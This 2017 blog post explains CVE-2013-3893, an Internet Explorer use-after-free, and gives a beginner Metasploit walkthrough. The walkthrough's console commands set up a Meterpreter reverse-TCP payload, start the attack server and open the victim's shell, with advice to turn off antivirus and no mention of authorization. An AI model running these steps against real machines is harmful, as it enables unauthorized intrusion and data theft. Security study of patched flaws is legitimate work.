Friday, September 8, 2017
Exploiting and Analysing CVE 2013 3893
Exploiting and Analysing CVE 2013 3893
On September 17, 2013 Microsoft Security Center announced a Security Advisory about a new zero-day vulnerability that has been spotted attacking Japanese financial companies. On October 8 they expanded that advisory with MS13-080, a bulletin containing information about an update that fixes the vulnerability that was exploited. The vulnerability was labeled CVE-2013-3893. Its an use-after-free vulnerability found in Internet Explorers dynamic link library mshtml.dll, in the SetMouseCapture functionality, and it allows remote code execution if exploited properly. The exploit was targeting at Internet Explorer 6 through 11 that ran on Windows XP or Windows 7 which also had Microsoft Office 2007 or Microsoft Office 2010 installed.
The term use-after-free bug in this case means that by accessing a web page with malicious code the Internet Explorer can be manipulated into allocating memory and then freeing it, even though it is still referenced. The freed memory can then be controlled by the attacker. When Internet Explorer executes commands from that memory there is a possibility that it will execute instructions created by the attacker. This bug usually results in corruption of data and the program just crashes, but if it is used by a hacker it may allow him to gain complete control of the system.
Another term we should highlight is remote code execution. It is associated with CVE-2013-3893 because the exploit allowed attackers to control the victim computers over the network. The victim only has to open the link with the malicious page and the attacker will instantly have control of the victims computer and access to his memory.
The vulnerability also implies that Microsoft Office 2007 or 2010 is installed because it contains hxds.dll module which isnt compatible with ASLR and can be used to bypass it.
Exploiting with Metasploit
This section is going to be a simple tutorial on how to use Metasploit to exploit this vulnerability. The tutorial is for beginners and readers who have never used Metasploit before and basically no programing skills are required to perform this exploit.First off, we should define some basic requirements that have to be met in order to preform a successful attack. The Metasploit exploit is a bit more restricted than the original exploit. The computer you wish to attack has to have Internet Explorer 9 running on Windows 7 and also has to have Office 7 or Office 10 installed.
If you havent already, you should download the free Metasploit Community edition here. Keep in mind that you should turn off both your antivirus and firewall while using Metasploit.
When you are done with the update then start your Metasploit Console and wait a bit for it to initialize. If you get confused or dont know what command to use at some point then just type help into the console and you will see a list of commands that you can use along with their explanations.
To start off, type use exploit/windows/browser/ie_setmousecapture_uaf in order to define that youre using the IE setmousecapture exploit. When you dont know the name of the exploit you can use the search command. For example, I found this exploit by typing search setmouse into the console:
Once youve set your exploit you should choose a payload that will be dropped into the vulnerable computer. To see a list of compatible payloads type show payloads into the console. Once youve found a suitable payload you can use the set command in order to select it. In this tutorial my aim is to be able to input commands with the Meterpreter tool so Ive typed in set payload windows/meterpreter/reverse_tcp.
For all additional exploit and payload options you can type in show options and you will see something like this:
For this particular payload we have to define the LHOST (the local hosts address) so we will type in set LHOST [ip address of your machine]. If you dont know your ip address then just use ipconfig. You should also redefine the SRVHOST by typing in set SRVHOST [ip address of your machine].
If you just want to test the exploit and dont care about gaining access to the shell on the victims machine you can use the windows/messagebox payload which will result in a message box appearing on the victims machine. You can also use the windows/download_exec payload to put an executable file on the targeted machine.
Once youre ready to start your exploit just type in exploit. If you have done everything correctly you will see this in your console:
When the exploit starts you will be given an URL address. Retype that address into the Internet Explorer address bar and Metasploit is going to begin attacking it. You should shortly after receive a message that a session has been opened. If you want to check to see which sessions you have opened type in sessions.
After that you just have to type in sessions -i 1 to start interacting with the victims shell.
You can now use Meterpreter to control the victims computer and inspect their data. You can see a list of commands you can use in Meterpreter on this link.
If your exploit isnt working properly there are a few things should check. First of, make sure your victims system meets all of the requirements. You should also make sure youre using IE9 32-bit version and not IE9 64-bit version. If the console is telling you that youre using the wrong browser even though youre using IE9 32-bit you should check if the Internet Explorer is running the page in IE7 compatibility mode. You can check that by clicking Tools in the Menu Bar and then selecting Compatibility View settings. If that is the case just remove the page from the compatibility list.
Analysing the Vulnerability and the Exploit
The best way to analyse an exploit is to use a debugger. The most frequently used debugger in pentesting is IDA Pro. It can help us figure out how the exploit actually works and how it affects the memory.The vulnerability lies in the setmousecapture() function of the Internet Explorer which is usually used to take control over mouse actions in the browser. The exploit creates two elements on the malicious page, one parent and one child element, and then makes an onclosecapture() event for the parent element that involves a document.write() function. When the setCapture() function for the child element is called it will trigger an event, which will result in an arbitrary memory release by using the document.write() function.
The memory that was used by the document.write() function will stay referenced and it will later be passed on to mshtml.dll resulting in IE9 crashing in mshtml.dll, due to incorrect memory reading.
This incorrect memory call is the basis of the exploit because the attackers can now make our system call a memory address controlled by them. However, ASLR and DEP make it hard to manipulate memory and call malicious functions.
One way ASLR can be bypassed is heap spraying. It allows the attackers to fill large chunks of memory with their data and increases the chance that their code will be initiated.
Another problem the hackers had to address is that Windows 7 wont execute code if they are located in the part of memory marked NX (no execute). Furthermore, because of ASLR, they dont know which segments of memory are currently used and are marked as executable.
This problem is bypassed by using the hxds.dll (a part of Microsoft Office) which isnt compatible with ASLR. Since it isnt in a random part of our memory the attackers can easily locate it and they can also easily make IE start it.
Conclusion
As we can see this exploit uses multiple vulnerable applications on Windows. By combining the bug in IEs mshtml.dll with hxds.dlls incompatibility with ASLR the attackers managed to gain complete access to the victims system.This example shows us how a few seemingly harmless bugs can be combined and exploited by resourceful hackers and how imaginative hackers really are when it comes to exploits.
download file now
